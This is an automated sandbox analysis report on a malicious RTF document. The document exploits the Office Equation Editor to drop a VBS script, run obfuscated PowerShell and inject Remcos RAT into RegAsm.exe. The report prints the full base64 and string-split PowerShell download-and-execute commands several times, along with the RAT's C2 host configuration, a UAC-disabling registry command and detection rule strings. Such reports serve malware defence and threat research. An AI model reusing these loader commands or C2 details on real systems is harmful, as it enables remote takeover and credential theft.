Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MKWbWHd5Ni.rtf

Overview

General Information

Sample name:MKWbWHd5Ni.rtf
renamed because original name is a hash value
Original sample name:93f8cd6440e951545875706461d25854.rtf
Analysis ID:1526391
MD5:93f8cd6440e951545875706461d25854
SHA1:789028f40f3a78ffcce107c4677e91b75bac0e6d
SHA256:297a951d047d377a45195c4a9e3c1c7a3a5b4ac6cc58b8e2c17d3ec7a2f09485
Tags:RATRemcosRATrtfuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Maps a DLL or memory area into another process
Obfuscated command line found
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3208 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3288 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 3444 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgetmebackgreatdayfo.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 3488 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFZlUmJvc2VQUkVmRVJFTmNFLlRvU3RSaW5HKClbMSwzXSsneCctSm9pbicnKSggKCdnJysnMjgnKyd1cmwnKycgPScrJyBzZzFodHQnKydwJysnczovL3Jhdy4nKydnaScrJ3RodWJ1JysncycrJ2VyYycrJ28nKyduJysndGUnKydudC5jb20nKycvTicrJ28nKydEZScrJ3RlYycrJ3RPbicrJy9Ob0QnKydlJysndGVjdE9uL3JlZnMvaGUnKydhZHMvbWFpbi8nKydEZXQnKydhaCcrJ05vJysndGgtJysnVi50eHRzZzE7JysnIGcyJysnOCcrJ2InKydhc2U2JysnNENvbnQnKydlJysnbicrJ3QgPScrJyAnKycoTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTicrJ2UnKyd0LldlJysnYicrJ0NsaWVuJysndCcrJykuJysnRCcrJ293bmxvJysnYScrJ2RTJysndHJpbicrJ2coZzI4dXJsKTsgJysnZzInKyc4YmluYScrJ3J5Q29udCcrJ2UnKyduJysndCA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb20nKydCJysnYXNlJysnNjQnKydTdCcrJ3JpbmcoZzInKyc4YmFzZTY0JysnQ28nKyduJysndGUnKydudCknKyc7ICcrJ2cyOCcrJ2FzJysnc2VtYmx5ICcrJz0nKycgWycrJ1JlZicrJ2xlJysnYycrJ3QnKydpb24nKycuQScrJ3NzZW1ibHknKyddOjpMb2FkJysnKGcyOGJpbmFyJysneUNvJysnbnQnKydlbnQpOyBbZG5saWIuSU8uSCcrJ28nKydtZV06OlYnKydBSScrJyhoJysnRGonKyd0eHQuRkZSJysnUkVXLycrJzAnKyc1Ni8zJysnMTEnKycuMScrJzUyLjMnKyc4JysnLjE1Ly86JysncCcrJ3R0JysnaGhEJysnaiwgaCcrJ0QnKydqJysnZGUnKydzYXRpdicrJ2FkJysnb2hEaicrJywgaEQnKydqZCcrJ2VzYXQnKydpJysndmFkJysnb2hEaiwgaERqZCcrJ2UnKydzJysnYXQnKydpdmFkJysnb2hEaiwnKycgJysnaERqUicrJ2VnQXNtaEQnKydqJysnLCBoRGpoRGosJysnaCcrJ0QnKydqaERqJysnKScpLlJlcExhQ0UoJ2hEaicsW1N0UklOZ11bQ0hBcl0zNCkuUmVwTGFDRSgnZzI4JywnJCcpLlJlcExhQ0UoJ3NnMScsW1N0UklOZ11bQ0hBcl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 3596 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $VeRbosePREfERENcE.ToStRinG()[1,3]+'x'-Join'')( ('g'+'28'+'url'+' ='+' sg1htt'+'p'+'s://raw.'+'gi'+'thubu'+'s'+'erc'+'o'+'n'+'te'+'nt.com'+'/N'+'o'+'De'+'tec'+'tOn'+'/NoD'+'e'+'tectOn/refs/he'+'ads/main/'+'Det'+'ah'+'No'+'th-'+'V.txtsg1;'+' g2'+'8'+'b'+'ase6'+'4Cont'+'e'+'n'+'t ='+' '+'(New-Obj'+'ect System.N'+'e'+'t.We'+'b'+'Clien'+'t'+').'+'D'+'ownlo'+'a'+'dS'+'trin'+'g(g28url); '+'g2'+'8bina'+'ryCont'+'e'+'n'+'t = [System.'+'Convert]::From'+'B'+'ase'+'64'+'St'+'ring(g2'+'8base64'+'Co'+'n'+'te'+'nt)'+'; '+'g28'+'as'+'sembly '+'='+' ['+'Ref'+'le'+'c'+'t'+'ion'+'.A'+'ssembly'+']::Load'+'(g28binar'+'yCo'+'nt'+'ent); [dnlib.IO.H'+'o'+'me]::V'+'AI'+'(h'+'Dj'+'txt.FFR'+'REW/'+'0'+'56/3'+'11'+'.1'+'52.3'+'8'+'.15//:'+'p'+'tt'+'hhD'+'j, h'+'D'+'j'+'de'+'sativ'+'ad'+'ohDj'+', hD'+'jd'+'esat'+'i'+'vad'+'ohDj, hDjd'+'e'+'s'+'at'+'ivad'+'ohDj,'+' '+'hDjR'+'egAsmhD'+'j'+', hDjhDj,'+'h'+'D'+'jhDj'+')').RepLaCE('hDj',[StRINg][CHAr]34).RepLaCE('g28','$').RepLaCE('sg1',[StRINg][CHAr]39))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
            • RegAsm.exe (PID: 3728 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 3876 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ptdercjwijh" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 3884 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\rvipsuupwrzfhg" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 3892 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\cpnhtnerszrskmtpxa" MD5: 8FE9545E9F72E460723F484C304314AD)
    • EQNEDT32.EXE (PID: 3984 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "cavps7.duckdns.org:1991:1", "Assigned name": "Agent-010524", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-43JG4A", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
MKWbWHd5Ni.rtfINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1669:$obj2: \objdata
  • 0x1653:$obj3: \objupdate
  • 0x162f:$obj6: \objlink
SourceRuleDescriptionAuthorStrings
00000009.00000002.886651440.00000000008D5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000009.00000002.886651440.00000000008F1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x6c4a8:$a1: Remcos restarted by watchdog!
          • 0x6ca20:$a3: %02i:%02i:%02i:%03i
          Click to see the 14 entries
          SourceRuleDescriptionAuthorStrings
          9.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            9.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              9.2.RegAsm.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
              • 0x6c4a8:$a1: Remcos restarted by watchdog!
              • 0x6ca20:$a3: %02i:%02i:%02i:%03i
              9.2.RegAsm.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
              • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
              • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
              • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
              • 0x6656c:$str_b2: Executing file:
              • 0x675ec:$str_b3: GetDirectListeningPort
              • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
              • 0x67118:$str_b7: \update.vbs
              • 0x66594:$str_b9: Downloaded file:
              • 0x66580:$str_b10: Downloading file:
              • 0x66624:$str_b12: Failed to upload file:
              • 0x675b4:$str_b13: StartForward
              • 0x675d4:$str_b14: StopForward
              • 0x67070:$str_b15: fso.DeleteFile "
              • 0x67004:$str_b16: On Error Resume Next
              • 0x670a0:$str_b17: fso.DeleteFolder "
              • 0x66614:$str_b18: Uploaded file:
              • 0x665d4:$str_b19: Unable to delete:
              • 0x67038:$str_b20: while fso.FileExists("
              • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
              9.2.RegAsm.exe.400000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
              • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
              • 0x6637c:$s1: CoGetObject
              • 0x66390:$s1: CoGetObject
              • 0x663ac:$s1: CoGetObject
              • 0x70338:$s1: CoGetObject
              • 0x6633c:$s2: Elevation:Administrator!new:
              Click to see the 14 entries

              Exploits

              barindex
              Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 51.83.251.113, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3288, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3288, TargetFilename: C:\Users\user\AppData\Roaming\picturewithgetmebackgreatdayfo.vBS

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFZlUmJvc2VQUkVmRVJFTmNFLlRvU3RSaW5HKClbMSwzXSsneCctSm9pbicnKSggKCdnJysnMjgnKyd1cmwnKycgPScrJyBzZzFodHQnKydwJysnczovL3Jhdy4nKydnaScrJ3RodWJ1JysncycrJ2VyYycrJ28nKyduJysndGUnKydudC5jb20nKycvTicrJ28nKydEZScrJ3RlYycrJ3RPbicrJy9Ob0QnKydlJysndGVjdE9uL3JlZnMvaGUnKydhZHMvbWFpbi8nKydEZXQnKydhaCcrJ05vJysndGgtJysnVi50eHRzZzE7JysnIGcyJysnOCcrJ2InKydhc2U2JysnNENvbnQnKydlJysnbicrJ3QgPScrJyAnKycoTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTicrJ2UnKyd0LldlJysnYicrJ0NsaWVuJysndCcrJykuJysnRCcrJ293bmxvJysnYScrJ2RTJysndHJpbicrJ2coZzI4dXJsKTsgJysnZzInKyc4YmluYScrJ3J5Q29udCcrJ2UnKyduJysndCA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb20nKydCJysnYXNlJysnNjQnKydTdCcrJ3JpbmcoZzInKyc4YmFzZTY0JysnQ28nKyduJysndGUnKydudCknKyc7ICcrJ2cyOCcrJ2FzJysnc2VtYmx5ICcrJz0nKycgWycrJ1JlZicrJ2xlJysnYycrJ3QnKydpb24nKycuQScrJ3NzZW1ibHknKyddOjpMb2FkJysnKGcyOGJpbmFyJysneUNvJysnbnQnKydlbnQpOyBbZG5saWIuSU8uSCcrJ28nKydtZV06OlYnKydBSScrJyhoJysnRGonKyd0eHQuRkZSJysnUkVXLycrJzAnKyc1Ni8zJysnMTEnKycuMScrJzUyLjMnKyc4JysnLjE1Ly86JysncCcrJ3R0JysnaGhEJysnaiwgaCcrJ0QnKydqJysnZGUnKydzYXRpdicrJ2FkJysnb2hEaicrJywgaEQnKydqZCcrJ2VzYXQnKydpJysndmFkJysnb2hEaiwgaERqZCcrJ2UnKydzJysnYXQnKydpdmFkJysnb2hEaiwnKycgJysnaERqUicrJ2VnQXNtaEQnKydqJysnLCBoRGpoRGosJysnaCcrJ0QnKydqaERqJysnKScpLlJlcExhQ0UoJ2hEaicsW1N0UklOZ11bQ0hBcl0zNCkuUmVwTGFDRSgnZzI4JywnJCcpLlJlcExhQ0UoJ3NnMScsW1N0UklOZ11bQ0hBcl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFZlUmJvc2VQUkVmRVJFTmNFLlRvU3RSaW5HKClbMSwzXSsneCctSm9pbicnKSggKCdnJysnMjgnKyd1cmwnKycgPScrJyBzZzFodHQnKydwJysnczovL3Jhdy4nKydnaScrJ3RodWJ1JysncycrJ2VyYycrJ28nKyduJysndGUnKydudC5jb20nKycvTicrJ28nKydEZScrJ3RlYycrJ3RPbicrJy9Ob0QnKydlJysndGVjdE9uL3JlZnMvaGUnKydhZHMvbWFpbi8nKydEZXQnKydhaCcrJ05vJysndGgtJysnVi50eHRzZzE7JysnIGcyJysnOCcrJ2InKydhc2U2JysnNENvbnQnKydlJysnbicrJ3QgPScrJyAnKycoTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTicrJ2UnKyd0LldlJysnYicrJ0NsaWVuJysndCcrJykuJysnRCcrJ293bmxvJysnYScrJ2RTJysndHJpbicrJ2coZzI4dXJsKTsgJysnZzInKyc4YmluYScrJ3J5Q29udCcrJ2UnKyduJysndCA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb20nKydCJysnYXNlJysnNjQnKydTdCcrJ3JpbmcoZzInKyc4YmFzZTY0JysnQ28nKyduJysndGUnKydudCknKyc7ICcrJ2cyOCcrJ2FzJysnc2VtYmx5ICcrJz0nKycgWycrJ1JlZicrJ2xlJysnYycrJ3QnKydpb24nKycuQScrJ3NzZW1ibHknKyddOjpMb2FkJysnKGcyOGJpbmFyJysneUNvJysnbnQnKydlbnQpOyBbZG5saWIuSU8uSCcrJ28nKydtZV06OlYnKydBSScrJyhoJysnRGonKyd0eHQuRkZSJysnUkVXLycrJzAnKyc1Ni8zJysnMTEnKycuMScrJzUyLjMnKyc4JysnLjE1Ly86JysncCcrJ3R0JysnaGhEJysnaiwgaCcrJ0QnKydqJysnZGUnKydzYXRpdicrJ2FkJysnb2hEaicrJywgaEQnKydqZCcrJ2VzYXQnKydpJysndmFkJysnb2hEaiwgaERqZCcrJ2UnKydzJysnYXQnKydpdmFkJysnb2hEaiwnKycgJysnaERqUicrJ2VnQXNtaEQnKydqJysnLCBoRGpoRGosJysnaCcrJ0QnKydqaERqJysnKScpLlJlcExhQ0UoJ2hEaicsW1N0UklOZ11bQ0hBcl0zNCkuUmVwTGFDRSgnZzI4JywnJCcpLlJlcExhQ0UoJ3NnMScsW1N0UklOZ11b
              Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49165, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3288, Protocol: tcp, SourceIp: 51.83.251.113, SourceIsIpv6: false, SourcePort: 80
              Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $VeRbosePREfERENcE.ToStRinG()[1,3]+'x'-Join'')( ('g'+'28'+'url'+' ='+' sg1htt'+'p'+'s://raw.'+'gi'+'thubu'+'s'+'erc'+'o'+'n'+'te'+'nt.com'+'/N'+'o'+'De'+'tec'+'tOn'+'/NoD'+'e'+'tectOn/refs/he'+'ads/main/'+'Det'+'ah'+'No'+'th-'+'V.txtsg1;'+' g2'+'8'+'b'+'ase6'+'4Cont'+'e'+'n'+'t ='+' '+'(New-Obj'+'ect System.N'+'e'+'t.We'+'b'+'Clien'+'t'+').'+'D'+'ownlo'+'a'+'dS'+'trin'+'g(g28url); '+'g2'+'8bina'+'ryCont'+'e'+'n'+'t = [System.'+'Convert]::From'+'B'+'ase'+'64'+'St'+'ring(g2'+'8base64'+'Co'+'n'+'te'+'nt)'+'; '+'g28'+'as'+'sembly '+'='+' ['+'Ref'+'le'+'c'+'t'+'ion'+'.A'+'ssembly'+']::Load'+'(g28binar'+'yCo'+'nt'+'ent); [dnlib.IO.H'+'o'+'me]::V'+'AI'+'(h'+'Dj'+'txt.FFR'+'REW/'+'0'+'56/3'+'11'+'.1'+'52.3'+'8'+'.15//:'+'p'+'tt'+'hhD'+'j, h'+'D'+'j'+'de'+'sativ'+'ad'+'ohDj'+', hD'+'jd'+'esat'+'i'+'vad'+'ohDj, hDjd'+'e'+'s'+'at'+'ivad'+'ohDj,'+' '+'hDjR'+'egAsmhD'+'j'+', hDjhDj,'+'h'+'D'+'jhDj'+')').RepLaCE('hDj',[StRINg][CHAr]34).RepLaCE('g28','$').RepLaCE('sg1',[StRINg][CHAr]39))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $VeRbosePREfERENcE.ToStRinG()[1,3]+'x'-Join'')( ('g'+'28'+'url'+' ='+' sg1htt'+'p'+'s://raw.'+'gi'+'thubu'+'s'+'erc'+'o'+'n'+'te'+'nt.com'+'/N'+'o'+'De'+'tec'+'tOn'+'/NoD'+'e'+'tectOn/refs/he'+'ads/main/'+'Det'+'ah'+'No'+'th-'+'V.txtsg1;'+' g2'+'8'+'b'+'ase6'+'4Cont'+'e'+'n'+'t ='+' '+'(New-Obj'+'ect System.N'+'e'+'t.We'+'b'+'Clien'+'t'+').'+'D'+'ownlo'+'a'+'dS'+'trin'+'g(g28url); '+'g2'+'8bina'+'ryCont'+'e'+'n'+'t = [System.'+'Convert]::From'+'B'+'ase'+'64'+'St'+'ring(g2'+'8base64'+'Co'+'n'+'te'+'nt)'+'; '+'g28'+'as'+'sembly '+'='+' ['+'Ref'+'le'+'c'+'t'+'ion'+'.A'+'ssembly'+']::Load'+'(g28binar'+'yCo'+'nt'+'ent); [dnlib.IO.H'+'o'+'me]::V'+'AI'+'(h'+'Dj'+'txt.FFR'+'REW/'+'0'+'56/3'+'11'+'.1'+'52.3'+'8'+'.15//:'+'p'+'tt'+'hhD'+'j, h'+'D'+'j'+'de'+'sativ'+'ad'+'ohDj'+', hD'+'jd'+'esat'+'i'+'vad'+'ohDj, hDjd'+'e'+'s'+'at'+'ivad'+'ohDj,'+' '+'hDjR'+'egAsmhD'+'j'+', hDjhDj,'+'h'+'D'+'jhDj'+')').RepLaCE('hDj',[StRINg][CHAr]34).RepLaCE('g28','$').RepLaCE('sg1',[StRINg][CHAr]39))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFZlUmJvc2VQUkVmRVJFTmNFLlRvU3RSaW5HKClbMSwzXSsneCctSm9pbicnKSggKCdnJysnMjgnKyd1cmwnKycgPScrJyBzZzFodHQnKydwJysnczovL3Jhdy4nKydnaScrJ3RodWJ1JysncycrJ2VyYycrJ28nKyduJysndGUnKydudC5jb20nKycvTicrJ28nKydEZScrJ3RlYycrJ3RPbicrJy9Ob0QnKydlJysndGVjdE9uL3JlZnMvaGUnKydhZHMvbWFpbi8nKydEZXQnKydhaCcrJ05vJysndGgtJysnVi50eHRzZzE7JysnIGcyJysnOCcrJ2InKydhc2U2JysnNENvbnQnKydlJysnbicrJ
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $VeRbosePREfERENcE.ToStRinG()[1,3]+'x'-Join'')( ('g'+'28'+'url'+' ='+' sg1htt'+'p'+'s://raw.'+'gi'+'thubu'+'s'+'erc'+'o'+'n'+'te'+'nt.com'+'/N'+'o'+'De'+'tec'+'tOn'+'/NoD'+'e'+'tectOn/refs/he'+'ads/main/'+'Det'+'ah'+'No'+'th-'+'V.txtsg1;'+' g2'+'8'+'b'+'ase6'+'4Cont'+'e'+'n'+'t ='+' '+'(New-Obj'+'ect System.N'+'e'+'t.We'+'b'+'Clien'+'t'+').'+'D'+'ownlo'+'a'+'dS'+'trin'+'g(g28url); '+'g2'+'8bina'+'ryCont'+'e'+'n'+'t = [System.'+'Convert]::From'+'B'+'ase'+'64'+'St'+'ring(g2'+'8base64'+'Co'+'n'+'te'+'nt)'+'; '+'g28'+'as'+'sembly '+'='+' ['+'Ref'+'le'+'c'+'t'+'ion'+'.A'+'ssembly'+']::Load'+'(g28binar'+'yCo'+'nt'+'ent); [dnlib.IO.H'+'o'+'me]::V'+'AI'+'(h'+'Dj'+'txt.FFR'+'REW/'+'0'+'56/3'+'11'+'.1'+'52.3'+'8'+'.15//:'+'p'+'tt'+'hhD'+'j, h'+'D'+'j'+'de'+'sativ'+'ad'+'ohDj'+', hD'+'jd'+'esat'+'i'+'vad'+'ohDj, hDjd'+'e'+'s'+'at'+'ivad'+'ohDj,'+' '+'hDjR'+'egAsmhD'+'j'+', hDjhDj,'+'h'+'D'+'jhDj'+')').RepLaCE('hDj',[StRINg][CHAr]34).RepLaCE('g28','$').RepLaCE('sg1',[StRINg][CHAr]39))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $VeRbosePREfERENcE.ToStRinG()[1,3]+'x'-Join'')( ('g'+'28'+'url'+' ='+' sg1htt'+'p'+'s://raw.'+'gi'+'thubu'+'s'+'erc'+'o'+'n'+'te'+'nt.com'+'/N'+'o'+'De'+'tec'+'tOn'+'/NoD'+'e'+'tectOn/refs/he'+'ads/main/'+'Det'+'ah'+'No'+'th-'+'V.txtsg1;'+' g2'+'8'+'b'+'ase6'+'4Cont'+'e'+'n'+'t ='+' '+'(New-Obj'+'ect System.N'+'e'+'t.We'+'b'+'Clien'+'t'+').'+'D'+'ownlo'+'a'+'dS'+'trin'+'g(g28url); '+'g2'+'8bina'+'ryCont'+'e'+'n'+'t = [System.'+'Convert]::From'+'B'+'ase'+'64'+'St'+'ring(g2'+'8base64'+'Co'+'n'+'te'+'nt)'+'; '+'g28'+'as'+'sembly '+'='+' ['+'Ref'+'le'+'c'+'t'+'ion'+'.A'+'ssembly'+']::Load'+'(g28binar'+'yCo'+'nt'+'ent); [dnlib.IO.H'+'o'+'me]::V'+'AI'+'(h'+'Dj'+'txt.FFR'+'REW/'+'0'+'56/3'+'11'+'.1'+'52.3'+'8'+'.15//:'+'p'+'tt'+'hhD'+'j, h'+'D'+'j'+'de'+'sativ'+'ad'+'ohDj'+', hD'+'jd'+'esat'+'i'+'vad'+'ohDj, hDjd'+'e'+'s'+'at'+'ivad'+'ohDj,'+' 